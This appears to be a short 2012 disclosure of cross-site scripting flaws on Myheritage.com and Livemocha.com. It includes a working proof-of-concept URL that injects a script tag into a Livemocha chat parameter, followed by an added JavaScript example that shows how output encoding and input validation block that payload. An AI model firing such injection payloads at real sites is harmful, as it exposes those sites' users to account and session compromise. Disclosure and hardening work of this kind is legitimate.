Myheritage.com and Livemocha.com suffer from cross site scripting vulnerabilities.
# Date: 11.03.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Blog: http://st2tea.blogspot.com
..................................................................
Social Networks.
5-10 minutes by hand.
Interesting place for cross site scripting.
1. Myheritage.com
We have multiple persistent cross site scripting vulnerabilities.
I put only 2.
http://www.myheritage.com/site-183672172/styles?popup=4%2C+5547469671#notificationPanelAnchor
http://2.bp.blogspot.com/-s-nwU9rPqvU/T1zYNxFcRYI/AAAAAAAAAuQ/5MRuvBzrelY/s1600/meheritage1.JPG
http://www.myheritage.com/family-1_1000001_183672172_183672172/nepit-private-nepit-private-nepit-born-nedjoli
http://4.bp.blogspot.com/-mkS4ZvBayM0/T1zYUAbFsPI/AAAAAAAAAuc/-BfAQChoHwA/s1600/myheritage2.JPG
2. Livemocha.com
We can see the XSS after the login page.
http://www.livemocha.com/userplane/frames?ext=html&is_src_user=true&strDestinationUserID=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E&frameTarget=/userplane/wm
(it's the chat link)
http://2.bp.blogspot.com/-x0_A6-iqYpM/T1zYoiup5PI/AAAAAAAAAuo/YPPqU-IjY5Q/s1600/livem.JPG
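
Added example (not part of the original advisory and not Livemocha's code): the strDestinationUserID value from the Livemocha URL above is decoded and placed into a frame template, first raw and then with URL and HTML encoding applied. The frame template, the user ID format and all function names are assumptions; only the URL comes from the advisory.

```javascript
// Added example; the URL is the one quoted in the advisory, everything else is constructed.
const reportedUrl =
  "http://www.livemocha.com/userplane/frames?ext=html&is_src_user=true" +
  "&strDestinationUserID=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E" +
  "&frameTarget=/userplane/wm";

// Decode one query parameter the way a web framework hands it to page code.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// HTML-encode the characters that can end a quoted attribute or open a tag.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical vulnerable template: the raw value lands inside a quoted attribute.
function renderUnsafe(userId) {
  return '<frame name="chat" src="/userplane/wm?strDestinationUserID=' + userId + '">';
}

// Hardened template: encode for the URL first, then for the HTML attribute.
function renderSafe(userId) {
  const inUrl = encodeURIComponent(userId);
  return '<frame name="chat" src="/userplane/wm?strDestinationUserID=' + escapeHtml(inUrl) + '">';
}

// Assumed ID format (not from the advisory): reject anything else before rendering.
function isValidUserId(userId) {
  return /^[A-Za-z0-9_-]{1,64}$/.test(userId);
}

// True when the rendered markup contains an element other than the single frame tag.
function injectsMarkup(html) {
  return (html.match(/<[a-z!\/]/gi) || []).length !== 1;
}

const payload = queryParam(reportedUrl, "strDestinationUserID");
console.log("decoded :", payload);
console.log("unsafe  :", renderUnsafe(payload), "->", injectsMarkup(renderUnsafe(payload)));
console.log("safe    :", renderSafe(payload), "->", injectsMarkup(renderSafe(payload)));
console.log("valid id:", isValidUserId(payload), isValidUserId("user_1024"));
```

Encoding is applied per output context (URL component, then HTML attribute); the allow-list check is a second layer that rejects the value before any template sees it.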